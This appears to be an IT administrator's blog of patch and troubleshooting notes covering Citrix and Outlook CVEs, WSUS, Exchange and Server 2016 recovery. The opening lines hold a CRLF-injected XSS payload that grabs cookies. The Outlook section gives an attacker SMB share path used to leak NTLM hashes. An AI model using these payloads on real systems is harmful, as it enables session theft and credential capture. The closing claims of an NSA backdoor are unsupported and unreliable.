02.07.2023

Attacker is able to change the redirection of the LOGOUT page. To date we are unsure if this is only if you you use SAML as in the NOV 2022 Exploit.

GET /oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1

Pre Authentication XSS in Citrix Gateway (CVE-2023-24488)

Die Abfrageparameter für URL werden nicht ausreichend gesäubert, bevor sie in den HTTP Location-Header eingefügt werden. Ein Angreifer kann dies ausnutzen, um einen Link zu erstellen, der beim Klicken das Opfer zu einer beliebigen Stelle umleitet. Alternativ kann der Angreifer Zeilenumbruchzeichen in den Location-Header einfügen, um vorzeitig die HTTP-Header zu beenden und eine XSS-Payload in den Antworttext einzufügen.

Auswirkungen
Ein Angreifer kann bösartige Links erstellen, die entweder das Opfer zu einer von ihm kontrollierten Website umleiten oder JavaScript im Browser des Opfers ausführen, wenn sie geklickt werden.

Betroffene Software
Die folgenden Versionen sind von dieser Schwachstelle betroffen:

Citrix ADC und Citrix Gateway 13.1 vor 13.1-45.61
Citrix ADC und Citrix Gateway 13.0 vor 13.0-90.11
Citrix ADC und Citrix Gateway 12.1 vor 12.1-65.35
Citrix ADC 12.1-FIPS vor 12.1-55.296
Citrix ADC 12.1-NDcPP vor 12.1-55.296

Produktbeschreibung
Citrix Gateway ist eine Netzwerk-Appliance, die verschiedene Funktionen, einschließlich Remote-Zugriffs-VPN-Diensten, bereitstellt.

Lösung
Aktualisieren Sie auf die neueste Version von Citrix Gateway.

LINK CITRIX:

Citrix ADC and Citrix Gateway Security Bulletin for CVE-2023-24487, CVE-2023-24488

https://support.citrix.com/article/CTX477714/citrix-adc-and-citrix-gateway-security-bulletin-for-cve202324487-cve202324488

Translated from English:

Anwendbare Produkte
Citrix ADC Citrix Gateway
Beschreibung des Problems
Es wurden Sicherheitslücken in den unten aufgeführten Citrix ADC- und Citrix Gateway-Versionen entdeckt, die bei Ausnutzung zu folgenden Sicherheitsproblemen führen könnten:

Betroffene Produkte, Versionen und Komponenten
Die folgenden unterstützten Versionen von Citrix ADC und Citrix Gateway sind von dieser Sicherheitslücke betroffen:

Citrix ADC und Citrix Gateway 13.1 vor 13.1-45.61
Citrix ADC und Citrix Gateway 13.0 vor 13.0-90.11
Citrix ADC und Citrix Gateway 12.1 vor 12.1-65.35
Citrix ADC 12.1-FIPS vor 12.1-55.296
Citrix ADC 12.1-NDcPP vor 12.1-55.296

Dieses Bulletin betrifft nur von Kunden verwaltete Citrix ADC- und Citrix Gateway-Installationen. Kunden, die Citrix-gemanagte Cloud-Services oder Citrix-gemanagte Adaptive Authentication nutzen, müssen keine Maßnahmen ergreifen.

CVE ID Beschreibung Voraussetzungen CWE CVSS
CVE-2023-24488 Cross-Site Scripting Appliance muss als Gateway konfiguriert sein (SSL VPN, ICA Proxy, CVPN, RDP Proxy) oder AAA-Virtual Server CWE-79 6,1
CVE-2023-24487 Willkürliches Lesen von Dateien Zugriff auf NSIP oder SNIP mit Zugriff auf das Management-Interface CWE-253 6,3

Was Kunden tun sollten
Betroffene Kunden von Citrix ADC und Citrix Gateway sollten so schnell wie möglich die entsprechenden aktualisierten Versionen von Citrix ADC oder Citrix Gateway installieren:

Citrix ADC und Citrix Gateway 13.1-45.61 und neuere Versionen
Citrix ADC und Citrix Gateway 13.0-90.11 und neuere Versionen von 13.0
Citrix ADC und Citrix Gateway 12.1-65.35 und neuere Versionen von 12.1
Citrix ADC 12.1-FIPS 12.1-55.296 und neuere Versionen von 12.1-FIPS
Citrix ADC 13.1-FIPS 13.1-37.150 und neuere Versionen von 13.1-FIPS
Citrix ADC 12.1-NDcPP 12.1-55.296 und neuere Versionen von 12.1-NDcPP

Danksagungen
Citrix dankt Petr Juhanak von Accenture, Dylan Pindur von Assetnote und Wisdomtree vom Ant Group Digital Financial Security Team für die Zusammenarbeit zum Schutz der Citrix-Kunden.

Was Citrix unternimmt
Citrix benachrichtigt Kunden und Vertriebspartner über dieses potenzielle Sicherheitsproblem durch die Veröffentlichung dieses Sicherheitsbulletins im Citrix Knowledge Center unter https://support.citrix.com/securitybulletins.

Unterstützung zu diesem Thema erhalten
Wenn Sie technische Unterstützung zu diesem Thema benötigen, wenden Sie sich bitte an den Citrix Technical Support. Die Kontaktdaten für den Citrix Technical Support finden Sie unter https://www.citrix.com/support/open-a-support-case.

Die offizielle Sicherheitsmeldung von Citrix finden Sie hier.

CVE-2023-23397 Was ausgenutz wird:

Anstatt Standard Microsoft Outlook Sound kann man für ein meeting reminder einen Custom Sound angeben. Dieser kann auf einem Share liegen. Da liegt der Hund begraben.

https://learn.microsoft.com/de-de/office/client-developer/outlook/mapi/pidlidreminderoverride-canonical-property

https://www.forbes.com/sites/daveywinder/2023/03/15/microsoft-outlook-warning-critical-new-email-exploit-triggers-automatically-update-now/?sh=47f058ce6e5e

CVE-2023-23397 ist ein Outlook-Bug. Wenn Sie eine eingehende E-Mail für einen Termin mit einer benutzerdefinierten Erinnerung (Ton, Attribut PidLIDReminder) senden, wird Outlook.exe (2012/2016) versuchen, die Sounddatei über SMB abzurufen, sogar von einem externen Share (ohne Berücksichtigung von Sites-Zonen in IE/EDGE/System). Wenn Port 445 zu diesem Ziel geöffnet ist, sendet das System einen NTLM-Hash außerhalb Ihres Netzwerks. Wie wir verstanden haben, können die meisten vorhandenen AV-Lösungen für On-Premise-Exchange derzeit dieses Attribut PidLIDReminder nicht scannen (Trend, Trellix Security für Exchange). Deshalb hat das MS Exchange-Team das Skript bereitgestellt.

Hier kann man für einen TERMIN einen Custom Sound angeben.

Z.B. Alarm "\\213.145.33.11\attacker_ldap_scanner_hash\M365_Ausfall_Nichts_geht_mehr_alle_user_Ferien.wav"

 PRIO1

besteht darin, das Outlook.exe-Patch zu installieren und die Clients neu zu starten, und auch sicherzustellen, dass Kunden kein SMB für externe Verbindungen öffnen. Dies ist in der Regel ab Client VLAN > WAN geschlossen. Heikel sind Home office, Remote worker welche je nach SPLIT VPN halt 445/SMB offen hätten.

Patches for Outlook 2013/2016:

https://support.microsoft.com/kb/5002254

2016 Direct download

https://www.catalog.update.microsoft.com/Search.aspx?q=outlook%202016 (All Outlook 2016 Patches, pick the ones from 14.03.2023)

https://catalog.s.download.windowsupdate.com/c/msdownload/update/software/secu/2023/02/outlook-x-none_a3461e8b8424793e267728be32cd83c294ebb897.cab (32BIT)

https://catalog.s.download.windowsupdate.com/c/msdownload/update/software/secu/2023/02/outlook-x-none_8d949e375d119c72a375435cd77a4797fb2e0b2b.cab (64BIT)

2013 Direct download

https://www.catalog.update.microsoft.com/Search.aspx?q=outlook%202013 (All Outlook 2013 Patches, pick the ones from 14.03.2023)

https://catalog.s.download.windowsupdate.com/c/msdownload/update/software/secu/2023/02/outlook-x-none_2cb1193a28972b39546f59d104ae5be489c01d8d.cab (64BIT)

https://catalog.s.download.windowsupdate.com/c/msdownload/update/software/secu/2023/02/outlook-x-none_2e7b2f55dcab1fd7d3b00aa1dbd2545fb90e435c.cab (32BIT)

Manuelle Installation. Auspacken der CAB files und DANN Doppelclick auf .MSP Patch file

Deployment ausserhalb WSUS, für die .CAB Files so kann man diese comnmandline installieren:

DISM.EXE für die Office CAB Files scheint nicht zu gehen.

Man kann aber das File aufmachen und dann einfach das MSP File installieren. Windows Installer sucht und findet den Rest. Z.B. die Quelle des Office Files.

msiexec /p c:\edv\ C:\edv\outlook-x-none_a3461e8b8424793e267728be32cd83c294ebb897\outlook-x-none.msp /qb

msiexec /p c:\edv\ C:\edv\outlook-x-none_a3461e8b8424793e267728be32cd83c294ebb897\outlook-x-none.msp /qn

DISM.EXE für die Office CAB Files scheint nicht zu gehen.

https://social.technet.microsoft.com/Forums/lync/en-US/683d7d72-b296-419f-b585-becd5d99b37f/dism-offline-update-error-0x80070002

dism /Online /Add-Package /PackagePath:"c:\edv\outlook-x-none_a3461e8b8424793e267728be32cd83c294ebb897.cab"

Je nach System gibt dies ein Fehler weil er das darunter notwendige CBS Paket nicht hat:

Failed to get the underlying CBS package. - CDISMPackageManager::OpenPackageByPath(hr:0x80070002)

In der Regel bei anderen CAB Packages sind diese dann mit dabei im CAB/Archiv hier nicht z.B. bei Outlook 2016 auf W11 22H2

Beispiel file dabei von 202X. Da musste man zuerst das SSU installieren und dann den Patch mit DISM.

Bei den jetzigen Outlook Patch aber nur ein MSP mit dabei

2016/W11

The Patch info from WSUS.

PRIO2

Ist FORENSIC, um herauszufinden, ob Sie solche E-Mails erhalten haben und hoffentlich verhindern, dass sie an Outlook.exe geliefert werden. Sie können auch diejenigen reparieren, die bereits angekommen sind. Wenn Sie On-Premise sind, überprüfen Sie, ob Ihre Exchange-AV-Lösung nach dem Attribut suchen kann (An sich ahte die AV Loesung fuer Exchange alle Rechte welche man extra für das laufen lassen des Scripts vergeben muss die Frage ist nur OB Sie mit der aktuellen version das Attribut finden)

Wichitg für PRIO 2 SKRIPT: Wir empfehlen dies nur für Personen, die Erfahrung mit solchen Befehlen haben, z. B. durch Integration einer Archivlösung oder einer mobilen Geräteverwaltungslösung (MDM). Möglicherweise müssen Sie auch mit Ihrem hausinternen Rechts- / Compliance-Team Rücksprache halten, da Sie jemandem vollen Zugriff auf die E-Mails Ihres CEO und Vorstands gewähren, soweit ich verstanden habe (ich habe das Skript nicht im Detail überprüft).

[https://microsoft.github.io/CSS-Exchange/Security/CVE-2023-23397/]

Das Skirpt macht folgendens:

• Generieren Sie eine unbegrenzte (vollständige) Throttle-Richtlinie für eine Gruppe oder einen Benutzer (wie ein MDM-Masterkonto oder ein Konto, das eine rechtliche Archivlösung speist).
• Generieren Sie eine Regel, damit ein Benutzer vollen Zugriff auf jede E-Mail, jeden Kalendereintrag usw. hat, die in der Exchange-Umgebung gespeichert sind (Application Impersonation / https://learn.microsoft.com/en-us/exchange/client-developer/exchange-web-services/impersonation-and-...).
• Scannen Sie alle E-Mails oder zumindest einige Tage rückwärts, da die Ukraine im 03/2022 angegriffen wurde, also für ein Jahr? Oder war diese Information falsch? Microsoft sagt hier das man besonders attratkive Targets scannen sollte (Wer sollen diese sein? Der CEO/VR oder nur der User?)

Handlungsbedarf 16.03.2023

Patch installieren und sicher stellen, dass alle den Reboot gemacht haben

Sicher stellen dass Port 445/SMB nach LAN>WAN geschlossen ist (Eventuell anpassen Remote Worker Firewall GPO/Policy oder dann via FW-Module z.B. vom Virenschutz, z.B. Mcafee ENS Firewall)

Die derzeit kursierenden PowerShell-Skripte sind ausschließlich für forensische Zwecke und die Suche nach Indicators of Compromise gedacht. Diese Skripte erfordern jedoch vorsichtiges Handling, da der Skript-User mit vollem Zugriff auf alle Ressourcen ausgestattet werden muss, einschließlich der Möglichkeit, die Geschwindigkeit des Skripts zu regulieren. Bitte führen Sie das Skript daher nicht aus, bis wir sicherstellen können, dass es nicht zu Problemen aufgrund von Sprachbarrieren kommt.

Es ist wichtig zu beachten, dass das PowerShell-Skript nicht notwendig ist, um die Outlook.exe-Sicherheitslücke zu schließen. Es dient ausschließlich der forensischen Untersuchung und dem Ersatz von 1-2% der Kalendereinträge, die aufgrund von Offline-Verbindungen noch nicht aktualisiert wurden. Es ist jedoch unwahrscheinlich, dass diese Skripte erforderlich sind, da die erste Welle des Angriffs durch eine E-Mail mit einem blockierten Anhang (.MSI) erfolgte.

Schließlich ist es wichtig zu betonen, dass der Exchange Patch vom März 2023 keine Auswirkungen auf die Outlook.exe-Sicherheitslücke hat.

Bild: Quelle ACEResponder/Twitter

Bild: Quelle MS, Learn

Guter Blog:

https://practical365.com/cve-2023-23397-ntlm-vulnerability/ (Nicht die Quelle der Info)

Starting march 2023, Microsoft EDGE will be the new Adobe Reader and Acrobat if you Opt IN

I just found some Information while searching for more Infos about the 02/2023 Windows Updates/Patches. This is interesting because we mostly do AutoUpdates for Defender and EDGE Updates while we analyse and test all other monthly CUMU updates per customer and then approved them in some schema from small to big customers.

This has worked great over the last few months where other companies had problems who just auto approve Updates.

Adobe is the company with the most PDF patents for advanced features in PDF files. All the free solution offer just a part of that or pay licence fees to Adobe, as we understood to date.

Starting in March, Auto Approved EDGE updates will include the Adobe Reader Engine in MS Edge, and it seems that the Adobe Acrobat (Writer) license will also be available via Edge. This eliminates the eternal discussion about the safest way to open PDFs from the web/email (not in Chrome with the Adobe Extension) and whether to use Reader, Acrobat (Writer), or the browser. If It's all the same and takes away the issue.

Acrobat Writer updates were often delayed because they were 170-500MB in size and didn't transfer quickly via Intunes or on-premise deployment to laptops. So one product was sometimes the older.

In addition, there was always the point who to fix with what to open .PDF. Adobe spent a lot of work in in Reader manuals and explanation for Enduser. Most of the times one single user in an enterprise want's it in another way and because he from QA changes the open with procedure via IT for all employee. Often because their Quality solution or add-on did not work with the Edge PDF engine.

Adobe and Microsoft have a new partnership to integrate the Adobe Reader Engine into the MS EDGE browser, as well as Adobe Sign (which is the digital signature) for MS Cloud things mentioned.

Eventually, Adobe Reader will disappear and MS software should then direct the Edge to display PDFs. No one knows what will happen to Chrome.exe. Google and Amazon are heavy against the Azure Cloud and the new licensing model for Microsoft server OS (As we understood it would be more expensive to run MS Server outside of Azure...)

 LINKS:

https://www.adobe.com/sign/pricing/plans.html?plans=teams

https://www.adobe.com/documentcloud/integrations/microsoft.html

https://techcommunity.microsoft.com/t5/microsoft-edge-insider/microsoft-edge-and-adobe-partner-to-improve-the-pdf-experience/ba-p/3733481

Genau so was will man wohl verhindern:

https://helpx.adobe.com/de/acrobat/kb/chrome-extension-not-working.html

 Some extracted info which seems interesting for us:

How do I use the advanced Adobe Acrobat PDF features in Microsoft Edge?

Activating the advanced features with the Adobe Acrobat PDF extension in Microsoft Edge requires a paid Adobe Acrobat subscription. To activate the features, in the PDF view in Microsoft Edge, navigate to the top right corner of the window and click the button with messaging to try the advanced features. From there follow the prompts best suiting your needs to complete the transaction. If you already have a paid Adobe Acrobat subscription, you can sign into your existing account to use the advanced features at no additional cost.

Can general users opt out of using Adobe Acrobat PDF capabilities in Microsoft Edge?

General users will be unable to revert to using the legacy PDF engine in Microsoft Edge after the Adobe Acrobat PDF engine launches.

How will this affect commercial organizations?

 When rollout begins in March 2023, there will be no changes to managed Windows devices in organizations unless you choose to opt in. Users on unmanaged Windows devices will see an unobtrusive Adobe brand mark in the bottom corner of their PDF view. These users will also see an option to try the advanced features, such as converting PDFs, combining files, editing text and images. If an organization chooses to opt in, users on managed devices will see the same changes. The built-in Microsoft Edge PDF solution with the Adobe Acrobat PDF engine will have full feature parity with the legacy Microsoft Edge PDF solution. No functionality will be lost.

August 08/2022 Patch KB5012170 Update for Secure Boot DBX problem 0x800f0922

Problem: You can't install August 2022 Update KB5012170 on some systems under certain condition where Secure Boot is enbled and not latest BIOS/UEFI Firmware . You will receive an Error 0x800f0922

Error: Package KB5015730 failed to be changed to the Installed state. Status: 0x800f0922.

The patch does a revert

System which is not affected

The updates fixes some secure boot problems as example:

CVE-2022-34301 | Eurosoft Boot Loader Bypass

CVE-2022-34302 | New Horizon Data Systems Inc Boot Loader Bypass

CVE-2022-34303 | Crypto Pro Boot Loader Bypass

Microsoft main link:

KB5012170: Security update for Secure Boot DBX: August 9, 2022 (microsoft.com)

https://support.microsoft.com/en-us/topic/kb5012170-security-update-for-secure-boot-dbx-august-9-2022-72ff5eed-25b4-47c7-be28-c42bd211bb15

What does the KB describe:

Describes the problem that certain firmware/Bios and GPO Settings should not patch KB5012170. The KB is very hard to dunerstand. We try to help a little. Please keep in mind that you can't update firmware without checking compatiblity on Laptops for docking station and maybe other things. In enterprise you can't can't just update laptop firmware over night and hope all is fine like microsoft thinks they can do with their M365/Azure solution and Autopolit clients. ;-)

So what does that mean if you don't have a post doc in IT?

Check if yout are affected with and have PCR7 active

You can find out the status of your UEFI / PCR7 / Bitlocker Setup with MSINFO32.exe (Elevated) or/and by running a DOS or PS command.

Some sample dumps and how to find out:

Affected product which has PCR7 mode shown:

Dell computer Precision 5530, Windows 10 21H2

msinfo32.exe commandline

shows:

Sicherer Startzustand    Ein    

PCR7-Konfiguration    Gebunden

DOS: manage-bde -protectors -get c:

Shows:

Automate checking client for PCR7:

You may use a) Your software Deployment b) PSEXEC from systernals c) Do not use GPO to deploy software if you are not 100% fireproof with scripting

With psexec:

PsExec - Windows Sysinternals | Microsoft Docs

Auotmate the msinfo32.exe with psexec

psexec -s \\computer001 C:\windows\system32\msinfo32.exe /nfo c:\edv\00_report\computer.txt /report c:\edv\00_report\computer_re.txt

Description of Microsoft System Information (Msinfo32.exe) Tool

Other samples not affected:

An HP Elitedesk 800 G3 (Older) with a NON UEFI BIOS

Binding not possible becauee older machine and NOT UEFI BIOS (Legacy used) because of better Deployment OS reasons.

DOS: manage-bde -protectors -get c:

PS:

Msinfo32.exe

Some newer Home system from HP Elitedesk with UEFI no Bitlocker GO or Bitlocker active (Out of the box enduser system)

BINDING POSSIBLE

manage-bde -protectors -get c:

Below you see under PCR7 that you did NOT run msinfo32 under "Administrative/Elevated" it says "Elevation required to view".

Here is msinfo32.exe with run as admin, PCR7 would be possible but is not activated

You can see in this specfic machine where PCR7 "Binding Possible" is shown there is not Bitlocker. That's why withou the Fimrware Update which was offered by HP this was the patch has installed.

Solution

1. Check that you have the latest Bios/Firmware
2. Check if you have PCR7 enabled like mentioned above

If not possible > as example because your docking station is not comaptible with latest firmware

Some further links and infos regarding the path:

ADV200011 - Security Update Guide - Microsoft - Microsoft Guidance for Addressing Security Feature Bypass in GRUB

Troubleshoot the TPM (Windows) - Windows security | Microsoft Docs

R730xd, BitLocker, Secure Boot, PCR7 issue - Dell Community

Event ID 7053,12072,12052,12042,12012,13042 on WSUS Server

ERROR:

Unable to open WSUS MMC or connect with Script/PS/Tools to the WSUS database. On Clients or Server your see an error when this happens because, the WSUS APP Pool on IIS is down.

What is the problem?

If this happens you will after a reboot of the server loose most of the APPROVAL or DENY on your WSUS backwards for years.

Solution:

Mostly 90% related to RAM memory the WSUS has and the Application POOL WSUS itself or you run out of space on your WSUS content drive.

Prelude:

In the past months, all long-time, running WSUS Server no matter on which OS they run seem to crash more often they did before. We first long time watched and thought this was related sporadic too:

• Multi usage of MMC Console (Several users checking WSUS)
• Space on D: drive (With all the Feature Update you are up to 1 Terra soon)
• Script, which we had running to maintain WSUS or best Clean up WSUS automatic after it, crashed again (Deny 12'000 Patches…)
• We also assumed it is caused by a mix of WID (Windows Intern DB/Different Version of SQL Express or STD > we updated some mixed used WSUS + EPO 5.10 to sql 2017)
• As always maybe AV Solutions, which pinpoint. But we use Mcafee ENS Endpoint with many Exceptions and it never blocked SQL or WID when configured right and not by beginners

None of that seemed the source of the problem.

It looks like the crashed are more often to memory handling of IIS Application Pools and total memory the HOST (VM) has.

Here are the errors we did see:

Solution:

1. Give the HOST on ESX/Hypervisor more memory. You could trace for hours to find out how much or you be smart and give it 16-20 GB RAM. It depends on history of WSUS (Like running for 5 years, amount of clients or patches, how you clean up the WSUS with Tools or scripts via SQL query).
2. Open IIS, Application Pools, WSUSPOOL, Advanced Settings, Change the "Private Memory Limit KB" to something under your ESX Memory you gave. (In our example the IIS APP process runs around 14GB RAM and we gave the Server 18GB)
3. Reboot and all works again

You can now see how much Memory the IIS APP poll is consuming on a larger WSUS with a lot of history over years (Lot of WID/SQL data…)

Event ID 7053,12072,12052,12042,12012,13042 on WSUS Server

ERROR:

Unable to open WSUS MMC or connect with Script/PS/Tools to the WSUS database. On Clients or Server your see an error when this happens because the WSUS APP Pool on IIS is down.

Whats the problem?

If this happens you will after a reboot of the server loose most of the APPROVAL or DENY on your WSUS backwards for years.

Solution:

Mostly 90% related to RAM memory the WSUS has and the Application POOL WSUS itself or you run out of space on your WSUS content drive.

Prelude:

In the past months all long time running WSUS Server no matter on which OS they run seem to crash more often then they did before. We first long time watched and thought this was related sporadic too:

• Multi usage of MMC Console (Several users checking WSUS)
• Space on D: drive (With all the Feature Update you are up to 1 Terra soon)
• Script which we had running to maintain WSUS or best Clean up WSUS automatic after it crashed again (Deny 12'000 Patches…)
• We also assumed it is caused by a mix of WID (Windows Intern DB/Different Version of SQL Express or STD > we updated some mixed used WSUS + EPO 5.10 to sql 2017)
• As always maybe AV Solutions which pinpoint. But we use Mcafee ENS Endpoint with many Exceptions and it never blocked SQL or WID when configured right and not by beginners

All of that seemed not the source of the problem.

It looks like the crashed are more often to memory handling of IIS Application Pools and total memory the HOST (VM) has.

Here are the errors we did see:

Solution:

1. Give the HOST on ESX/Hypervisor more memory. You could trace for hours to find out how much or you be smart and give it 16-20 GB RAM. It depends on history of WSUS (Like running for 5 years, amount of clients or patches, how you clean up the WSUS with Tools or scripts via SQL query).
2. Open IIS, Application Pools, WSUSPOOL, Advanced Settings, Change the "Private Memory Limit KB" to something under your ESX Memory you gave. (In our example the IIS APP process runs around 14GB RAM and we gave the Server 18GB)
3. Reboot and all works again

Y

You can now see how much Memory the IIS APP poll is consuming on a larger WSUS with a lot of history over years (Lot of WID/SQL data…)

WSUS, W10/11 how to install a WSUS Update (KB patch) Manual with DISM from WSUScontent source Directory

This blog entry is about two things.

1. How to install a Windows Update from WSUS Source content folder manual by hand with DISM
2. Mcafee ENS 10.X, IPS Exploit Rule 6133 may block tiworker.exe with some updates (Mitre T1562)

Here is how to get the info which file is for what KB from WSUS-Server:

Search the file in your WSUSCONTENT folder

UN-7ZIP the cab file

For most Monthly patch day packages you also often need SSU (Servicing Stack Update). In most patches this is included. So you have several CAB files as seen above. Install the SSU first.

Servicing Stack Updates (SSU): Frequently Asked Questions (microsoft.com)

Install 1 the SSU.

dism /Online /Add-Package /PackagePath:"c:\drivers\SSU-19041.1220-x64.cab.cab"

Install 2 patch itself:

dism /Online /Add-Package /PackagePath:"c:\drivers\Windows10.0-KB5005565-x64.cab"

Keep an EYE on complex Antivirus with IPS Modules that do more than pattern scanning.

We have seen some Exploit IPS rules from Mcafee ENS 10.X which are ON by default but should be on to protect from Ransomware. It is good to keep an eye on those rules. Please carefully read the FULL alert in your ENS. Most of the times it says "WOULD BLOCK" if the EPO Admin did activate some rules in monitor mode (To Test new rules).

Exploit Rule 6133, change EPO side in ENS Policy

Unable to import KB Notfall/Interim/Post Microsoft Patchday patch into WSUS-Server running under Microsoft Server 2012 R2.

Problem: You are unable to import Patches from Windows Update Catalog on 2012 R2 WSUS

Problem: You don't see the import direct into WSUS button /Direct in WSUS-importieren auf 2019 nicht sichtbar (EDGE/IE mix)

Most people discover while in a hurry to deploy following 14.11.2021 emergency patches post 11/2021 November updates which takes apart their Azure, Load Balancer, ADFS, WAF-IIS etc.

Windows Server 2019: KB5008602 — DOWNLOAD

Windows Server 2016: KB5008601 — DOWNLOAD

Windows Server 2012 R2: KB5008603 — DOWNLOAD

Windows Server 2012: KB5008604 — DOWNLOAD

Windows Server 2008 R2 SP1: KB5008605 — DOWNLOAD

Windows Server 2008 SP2: KB5008606 — DOWNLOAD

https://docs.microsoft.com/en-us/windows/release-health/status-windows-10-1607-and-windows-server-2016#2748msgdesc

Microsoft has released out-of-band updates to address authentication failures related to Kerberos delegation scenarios impacting Domain Controllers (DC) running supported versions of Windows Server. On impacted systems, end-users cannot sign into services or applications using Single Sign-On (SSO) in Active Directory on-premises or hybrid Azure Active Directory environments.

On the WSUS-Server if you try to Import a patch from WSUS-catalog it fails:

ERROR/FEHLER you See:

"Es konnten nicht alle Updates importiert werden. Wenn Sie den Vorgang abgebrochen haben, starten Sie den Import der Updates erneut. Ist ein Fehler aufgetreten, klicken Sie in der Statusspalte neben dem jeweiligen Update auf Fehler, um die Lösung für das Problem anzuzeigen."

Here is the process to Import a KB File into your WSUS.

*********** STEP NEEDED if you run WSUS on ONLY Server 2019 ************** FROM HERE

If you are UNABLE to see the ADD/Hinzufügen on Server 2019 then do following. Start iexplore.exe manual from start menu.

Open the site:

https://catalog.update.microsoft.com/

Install the Plugin (Only appears on IE Internet Explorer 11 not EDGE) on Server 2019

You can check the add-on here also in IE addons:

Open Import from Windows Catalog

The site will open in EDGE > Copy the full URL and open iexplore.exe (IE11) again, past the full URL there

Now in IE you see the import button:

Still you can ONLY import the 2019 patches on WSUS running on Server 2019 ;-) Very nice. We need to rollout full SCCM now for every SBS/KMU?

*********** STEP NEEDED if you run WSUS on Server 2019 ************** TO HERE / END STEP 2019 ONLY

Error:

Importergebnisse

Solution:

Add following Registry Key and reboot the Server

Cmd line 1 line:

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319 /V SchUseStrongCrypto /T REG_DWORD /D 1

Single registry values:

VALUE name: SchUseStrongCrypto

Value Data: 1

Type: DWORD (32-bit) Value

Reboot

Retry

OK

ISO/PATCH: ExchangeServer2016-x64-cu20

Cumulative Update 20 for Exchange Server 2016 (microsoft.com)

 Problem:

Exchange 2016 CU20 Setup.exe /preparead (Version 15.1.2242.4 Fails) on Server 2016 (1607)

Step Configuring Microsoft Exchange Server Organization Preparation results FAILED

Exchange 2016 CU 20 need and fails to update Active Directory Schema to newer Version (setup.exe /prepareschema works setup.exe /Preparead fails) if you have renames Outlook Web App Policy Default/default/DEFAULT.

We had a case in a Mother / Child Domain setup where we had to update Active Directory of the Mother domain of the company with commandline to a new Schema Version. This was related to the second Exchange 2016 Breach/Hotfix and we wanted to uplift Exchange 2016 from CUMU 19 to 20 urgently.

Prepareschema worked but the second command preparead failed.

 Schema Versions

 ERROR you see during the setup.exe /preparead

Source of problem:

You can see the OWA APP Policy you have with following:

Get-owamailboxpolicy –Domaincontroller Butschdcw1 | Fl identity

Notice the case Sensitivity of the IDENTITY "Default/default/DEFAULT"

Error full:

Workaround:

Change the identity name of Outlook Web app Policy back to Default

1. Go into Exchange 2016 GUI (Exchange Administrative Center)
2. Permission / Berechtigung
3. Outlook Web App-Policy/Outlook Web App-Richtlinien
4. Mark the "Default/default/DEFAULT" and click the PENCIL/EDIT
5. Change the name to Default (D large rest small chars)
6. On DOS replicate the DC's with repadmin.exe /syncall

After that you can run setup.exe /preparead and update the Schema for Exchange 2016 CU

Check the Schema after replication with repadmin.exe /syncall

CHECK OBJECTVERSION:

$RootDSE= ([ADSI]"").distinguishedName

([ADSI]"LDAP://cn=swiss,cn=Microsoft Exchange,cn=Services,cn=Configuration,$RootDSE").objectVersion

CHECK RANGEUPPER:

$RootDSE= ([ADSI]"").distinguishedName

([ADSI]"LDAP://CN=ms-Exch-Schema-Version-Pt,CN=Schema,CN=Configuration,$RootDSE").rangeUpper

16220 > OBJECTVERSION

15333 > RANGEUPPER

Some further reading why this could have happened

https://devblogs.microsoft.com/scripting/weekend-scripter-unexpected-case-sensitivity-in-powershell/

https://superuser.com/questions/720037/powershell-if-statement-case-insensitive

Final note on this issue:

We have seen several other such related issues with 2016/2019 Exchange. Something does not update or install simply because something is case sensitive or some argument is missing or there where it should not be. Mainly in long history customer which where over 15 years on Exchange in several version.

We know how to fix but always say "And then? Next Update or when it runs same? Does it run?" And sometimes Tier 3 from Microsoft does nothing else. They compare what's different with the customer to their reference and then change the Attribute with ADSIEDIT and close the case. That's it, no explanation.

Still the above mentioned gives me some bad feeling. The patch was released ASAP and it was the second patch. If the tested the patch to death someone else would have come again and said why do they keep the patch back so long? (For IT > It was because they had to discuss so long with NSA on how to turn things back).

If you read the story about the FBI who could change your Exchange settings by court you know what happened if you are not a naive IT-world geek.
Cloud Office 365 was not affected because their NSA backdoor works in another way (Read more on Google or search MSDN TechNet

Hello,

This is a collection of some technical things we used to recover a SRV 2016 with blue screens. We assume the first crash was related to a too early SRV 2016 VL Release ISO and ESX 6.5 (From 2018) and a combination of a Windows Defender Update.

This may help you to recover a server 2016 in general. It's so rare with 2012R2/2016 that this may help because it's not daily and people tend to go back A Snapshot or restore from Veeam these days. Still we have seen this happen.

SRV 2016, Windows Patch, BSOD, STOP CODE, 0xc000021a or CRITICAL SERVICE FAILED, ROLLBACK, Blue screen how to

Windows Patch, BSOD, STOP CODE, 0xc000021a, ROLLBACK, Blue screen how to (Notice the PAGE FILE Partition where memory DUMP was done)

BSOD, Bluescreen on Server 2016

STOP CODE, 0xc000021a

STOP CODE, CRTITICAL SERVICE FAILED

Server 2016 problems patches 02/2021: KB4601318 fails to update, fails at 24% Windows Server 2016 - Microsoft Q&A

Customer did run following VMware setup for the cluster (Because they wanted to test the newer release for some days)

VMware ESX Versions:

6.5 Version 9298722

6.5 Version 13635690

Build numbers and versions of VMware ESXi/ESX (2143832)

Rollback of Updates that caused the Bluescreen if you installed Windows Update before.

• Choose blue recovery console
• Choose troubleshoot
• Choose cmd.exe
• Change KEYBOARD layout so you type the Local Admin password correct
• Logon with Local Admin password

Rollback the last updates with: dism /image:D:\ /cleanup-image /revertpendingactions (D: is the drive where your Windows Server install is thus where c:\porgram files and c:\windows are (Search that Partition from C: to Z:))

Enter password (Hopefully)

Change KEYBOARD layout so you type the Local Admin password correct

Logon with Local Admin password

Search the windows Partition

Check with:

Sfc /scannow

Run: checkdisk if you think there is damage to file system or disk:

Chkdsk G: /f /r /x

Check the pending operations he should do or has done during the crash:

Remove C:\windows\winsxs\pending.xml.

Cd g:\windows\winsxs\

Rename pending.xml pending.old

Rollback the last updates with:

dism /image:D:\ /cleanup-image /revertpendingactions

D: is the drive where your Windows Server install is thus where c:\porgram files and c:\windows are (Search that Partition from C: to Z:)

Error: 0x800f082f

BAD: (Looks more worse now….)

GOOD: (Looks good until you try to reinstall the same patch in 1 week again…)

Weputil.exe reboot

OR

Type: EXIT

OR NOT

If you have "CRITICAL SERVICE FAILED" this could be related to a UNSIGNED DRIVER or something is wrong with Certificates (CODE SIGNING). Maybe ask

Firewall TEAM if they block CERTIFICATE REVOCATION and if they don't know what you talk about check yourself. Read more on blog.

Try these BOOT Option with F8

